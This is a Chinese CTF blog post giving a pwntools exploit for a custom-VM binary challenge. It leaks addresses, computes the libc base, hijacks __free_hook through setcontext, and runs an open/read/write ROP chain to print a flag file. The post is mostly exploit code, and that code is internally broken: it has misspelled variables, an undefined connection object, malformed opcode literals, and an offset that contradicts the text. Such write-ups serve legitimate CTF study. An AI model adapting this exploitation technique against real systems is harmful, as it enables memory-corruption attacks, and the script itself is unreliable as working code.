**前言:上个星期复现了一道vmpwn题,忘记写到博客了,所以今天写一下,此题也属于比较常规的一种vmpwn题,只要逆出来opcode指令就能做出,这里根据官方wp来进行了复现了一下
思路:直接泄露了memaddr,然后再利用read往memaddr的后面进行了srop进行读取,即可
这里用到setcontext+15来控制执行流
这里没什么好演示的,直接给出exp吧**
exp:
#coding:utf8
from pwn import *
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
malloc_hook_s = libc.symbols['__malloc_hook']
free_hook_s = libc.symbols['__free_hook']
#opcodes
MOV_RAX_RSP = 0x10
MOV_RAX_I = 0x11
MOV_RBX_I = 0x12
MOV_RCX_I = 0x13
MOV_RAX_MEM_ADDR = 0x20
MOV_RAX_MEM = 0x21
PUSH_RAX = 0x44
POP_RBX = 0x52
ZERO_RAX = 0x6D
SYSCALL = 0x8F
#sh = process('./vmpwn',env={'LD_PRELOAD':'./libc-2.23.so'})
sh = remote('127.0.0.1',8666)
#泄露虚拟机的mem地址
sh.sendafter('name:','a'*0xF0)
sh.recvuntil('a'*0xF0)
vm_mem_addr = u64(sh.recv(6).ljust(8,'\x00'))
print 'vm_mem_addr=',hex(vm_mem_addr)
vm_shellcode_addr = vm_mem_addr + 0x2E20
opcode=[
'\x20'+'\x0', #mem-->rax
'\x8f'+'\x3', #free(rax)
'\x21'+'\x0', #mem+0x88---->rax
'\x44'+'\x52', #push rax pop rbx rbx--->rax
'\x11'+'\x1', #rax---->1
'\x13'+'\x20',
'\x8f'+'\x1', #write(rax,rbx,rcx) write(1,mem+0x88,0x20)
'\x6d',
'\x12'+p64(vm_shellcode_addr+len(opcode)+0x20),
'\x13'+'\x1000', #read(0,vmshellcode+code+0x20),
'\x8f'+'0', #sycall(0) read
]
payload='a'*0x100+p64(vm_shellcode_addr)
for i in range(len(opcode)):
pyload+=opcode[i]
sh.sendafter('say:',payload)
sh.recvuntil('Now,I recevie your message,bye~')
sh.recvuntil('\n')
sh.recv(0x20)
main_arena_88 = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_88 & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
open_addr = libc_base + libc.sym['open']
read_addr = libc_base + libc.sym['read']
write_addr = libc_base + libc.sym['write']
setcontext_addr = libc_base + libc.sym['setcontext']
pop_rdi = libc_base + 0x0000000000021112
pop_rsi = libc_base + 0x00000000000202f8
pop_rdx = libc_base + 0x0000000000001b92
bss = libc_base + libc.bss()
print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)
print 'setcontext_addr=',hex(setcontext_addr)
opcode=[
'\x6d',
'\x12'+p64(free_hook_addr-0xA0+8),
'\x13'+'0x1000',
'\x8f'+'\x0', #read(0,rbx,0x1000)
]
payload=''
for i in range(len(opcode)):
payload+=opcode[i]
p.send(payload)
rop=p64(pop_rdi)+p64(bss+0x200)+p64(pop_rsi)+p64(0)+p64(open_addr) #open
rop+=p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(bss+0x200)+p64(pop_rdx)+p64(0x100)+p64(read_addr)
rop+=p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(bss+0x200)+p64(pop_rdx)+p64(0x100)+p64(write_addr)
rop+='flag\x00'
payload=p64(setcontext_addr+0x35)+p64(free_hook_addr+0x15)+rop
p.send(paylaod)
p.interactive()
总结:自己tcl,还是逆向分析能力不够,分析代码分析不出来什么,感觉懒吃了一大半,只要能逆出来就好做